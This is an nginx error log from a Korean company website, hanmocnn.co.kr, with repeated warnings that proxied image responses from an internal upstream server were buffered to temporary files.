2026/02/16 21:49:42 [warn] 886#886: *39677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/91/0000010919 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:49:43 [warn] 886#886: *39677 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/92/0000010920 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:56:10 [warn] 886#886: *39690 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/92/0000010921 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:56:10 [warn] 886#886: *39690 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/92/0000010922 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:56:10 [warn] 886#886: *39690 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/92/0000010923 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:56:11 [warn] 886#886: *39690 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/92/0000010924 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:56:43 [warn] 886#886: *39703 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/92/0000010925 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:56:43 [warn] 886#886: *39703 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/92/0000010926 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:57:35 [warn] 886#886: *39717 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/92/0000010927 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:59:07 [warn] 886#886: *39730 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/92/0000010928 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:59:07 [warn] 886#886: *39730 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/92/0000010929 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 21:59:08 [warn] 886#886: *39730 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/93/0000010930 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 22:06:50 [warn] 887#887: *39757 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/93/0000010931 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 22:10:30 [warn] 887#887: *39769 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/93/0000010932 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 22:10:30 [warn] 887#887: *39769 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/93/0000010933 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 22:52:26 [warn] 887#887: *39800 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/93/0000010934 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 22:52:26 [warn] 887#887: *39800 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/93/0000010935 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 22:58:56 [warn] 885#885: *39812 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/93/0000010936 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 22:58:56 [warn] 885#885: *39812 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/93/0000010937 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 22:59:53 [warn] 885#885: *39812 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/93/0000010938 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:00:51 [warn] 885#885: *39812 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/93/0000010939 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:03:40 [warn] 885#885: *39846 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/94/0000010940 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:03:40 [warn] 885#885: *39846 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/94/0000010941 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:25:14 [warn] 885#885: *39864 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/94/0000010942 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:25:14 [warn] 885#885: *39864 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/94/0000010943 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:29:17 [warn] 885#885: *39878 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/94/0000010944 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:31:15 [warn] 885#885: *39891 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/94/0000010945 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:33:56 [warn] 885#885: *39904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/94/0000010946 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:33:56 [warn] 885#885: *39904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/94/0000010947 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:41:16 [warn] 885#885: *39917 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/94/0000010948 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:41:16 [warn] 885#885: *39917 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/94/0000010949 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:41:16 [warn] 885#885: *39917 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/95/0000010950 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:41:17 [warn] 885#885: *39917 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/95/0000010951 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:47:14 [warn] 888#888: *39941 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/95/0000010952 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:47:14 [warn] 888#888: *39941 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/95/0000010953 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:47:14 [warn] 888#888: *39941 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/95/0000010954 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:49:18 [warn] 888#888: *39953 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/95/0000010955 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:56:08 [warn] 888#888: *39965 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/95/0000010956 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:56:08 [warn] 888#888: *39965 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/95/0000010957 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/16 23:56:54 [warn] 888#888: *39965 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/95/0000010958 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:03:29 [warn] 895#895: *39990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/95/0000010959 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:03:29 [warn] 895#895: *39990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/96/0000010960 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:03:29 [warn] 895#895: *39990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/96/0000010961 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:03:29 [warn] 895#895: *39990 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/96/0000010962 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:06:22 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/96/0000010963 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:06:22 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/96/0000010964 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:06:22 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/96/0000010965 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:06:22 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/96/0000010966 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:07:48 [warn] 898#898: *40002 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/96/0000010967 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:57:36 [warn] 895#895: *40050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/96/0000010968 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:57:36 [warn] 895#895: *40050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/96/0000010969 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:57:36 [warn] 895#895: *40050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/97/0000010970 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:58:34 [warn] 895#895: *40050 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/97/0000010971 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:59:38 [warn] 895#895: *40073 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/97/0000010972 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:59:38 [warn] 895#895: *40073 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/97/0000010973 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:59:38 [warn] 895#895: *40073 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/97/0000010974 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 00:59:38 [warn] 895#895: *40073 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/97/0000010975 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:02:01 [warn] 895#895: *40086 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/97/0000010976 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:02:01 [warn] 895#895: *40086 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/97/0000010977 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:02:01 [warn] 895#895: *40086 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/97/0000010978 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:10:35 [warn] 895#895: *40101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/97/0000010979 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:10:35 [warn] 895#895: *40101 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/98/0000010980 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:19:19 [warn] 895#895: *40133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/98/0000010981 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:19:19 [warn] 895#895: *40133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/98/0000010982 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:19:19 [warn] 895#895: *40133 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/98/0000010983 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:26:25 [warn] 895#895: *40149 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/98/0000010984 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:26:25 [warn] 895#895: *40149 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/98/0000010985 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:26:25 [warn] 895#895: *40149 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/98/0000010986 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:26:26 [warn] 895#895: *40149 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/98/0000010987 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/17 01:27:55 [warn] 898#898: *40165 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/98/0000010988 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
